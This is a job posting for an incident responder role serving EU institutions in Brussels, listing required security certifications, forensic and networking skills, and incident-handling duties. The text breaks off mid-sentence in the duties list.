Incident Responder

**Location**:
Brussels, Belgium

**Security Clearance**:
EU Secret

**Introduction**:
Security Incident Handling aims at providing a safe communications and information infrastructure for the Contracting EU Institutions' (EU-Is’) user community and information systems by detecting, analysing, and responding to cyber-attacks and security incidents.

This service involves security incident detection, containment, eradication, and recovery by taking action to protect systems and networks affected or threatened by intruder activity, providing solutions and mitigation strategies from relevant advisories or alerts, and defining and executing responses plans and playbook entries. It also encompasses the set of standards, processes, tools, technology, and skilled staff to detect in the earliest stage and to efficiently respond to cyber-attacks and security incidents.

**Skills, knowledge, experience required**:

- At least 1 certification in the field of incident handling:

- GCIH (GIAC Certified Incident Handler);
- GCIA (GIAC Certified Intrusion Analyst);
- ECIH (EC-Council Certified Incident Handler);
- CSIH (SEI Certified Computer Security Incident Handler);
- SCPO (SABSA Certified Security Operations and Service Management Practitioner);
- Minimum 2 years’ experience in networking (TCP/IP, SNMP, DNS, Syslog-ng, etc.);
- Sound knowledge of and minimum 1 year of experience with IT security issues;
- Sound background and minimum 1 year of experience in the following areas:

- Operating system security and working with multiple operating systems;
- Anti-virus technologies;
- Network security:

- Practical level understanding of common TCP/IP-based services and protocols such as DNS, DHCP, HTTP, FTP, SSH, and SMTP;
- Firewall theory;
- Proxies and reverse proxies;
- Intrusion detection systems (IDS) and intrusion prevention systems (IPS);
- Full packet capture analysis;
- Vulnerability assessment and handling;
- Malware reverse engineering;
- Handling malicious code incidents;
- System (file and memory) and network forensics analysis with tools such as:

- Forensic Toolkit (FTK);
- EnCase Enterprise;
- Knowledge of development and scripting languages such as:

- Python;
- C/C++;
- Java;
- JavaScript;
- Perl or Ruby;
- Regular expressions;
- Linux shell/bash;
- MS Windows PowerShell;
- Minimum 1 year of experience with:

- EnCase Enterprise and EnCase Cybersecurity or FTK/AccessData (AD) Enterprise or Mandiant Intelligent Response (MIR);
- Volatility framework;
- SIFT Workstation or The Sleuth Kit (TSK).

**Desirable**:

- At least 1 certification among the following:

- GPEN (GIAC Certified Penetration Tester);
- GCED (GIAC Certified Enterprise Defender);
- GPPA (GIAC Certified Perimeter Protection Analyst);
- GCFE (GIAC Certified Forensic Examiner);
- GCFA (GIAC Certified Forensic Analyst);
- GNFA (GIAC Certified Network Forensic Analyst);
- CFCE (IACIS Certified Forensic Computer Examiner);
- CCFP (Certified Cyber Forensics Professional);
- SCMO (SABSA Certified Security Operations and Service Management Specialist);
- Minimum 1 year of experience with STIX (Structured Threat Information Expression) with a particular focus on the following related standards:

- CybOX (cyber observables);
- CAPEC (attack patterns);
- MAEC (malware);
- TAXII (threat information exchange).

**Duties/role**:

- Collecting from and correlating with information sources;
- Assessing incoming incident reports and performing efficient triage;
- Acknowledging alerts from/to the reporter;
- Confirming and classifying the incidents;
- Opening the incidents in the workflow system, identifying the stakeholders and notifying them;
- Assigning the case to the appropriate incident handlers and initiating the incident handling process;
- Providing continuous improvement of incident response plans and playbook entries;
- Defining and carrying out security incident identification measures;
- Overseeing the ongoing analysis activities (forensics or reverse engineering) and analysing data in order to build a comprehensive view of the incident;
- Maintaining and sharing incident documentation:

- Elaborating the map of the attacks/incidents with tools such as MS Visio and Maltego;
- Building a reliable timeline of the incident;
- Maintaining a situation report using relevant information sharing tool (i.e. web portal, wiki);
- Defining response strategy and presenting it to Management for approval:

- Identification, data collection and analysis;
- Containment;
- Eradication;
- Recovery;
- Defining and carrying out containment, eradication, and recovery measures;
- Providing technical assistance to all stakeholders;
- Coordinating incident response;
- Participating in cyber-crisis management and coordination:

- Preparing and maintaining action plans;
- Drafting meeting minutes and reports;
- Following up on the execution of actions decided by the Crisis Committee;
- Arranging crisis logistics, including meetings;
- Examining available information a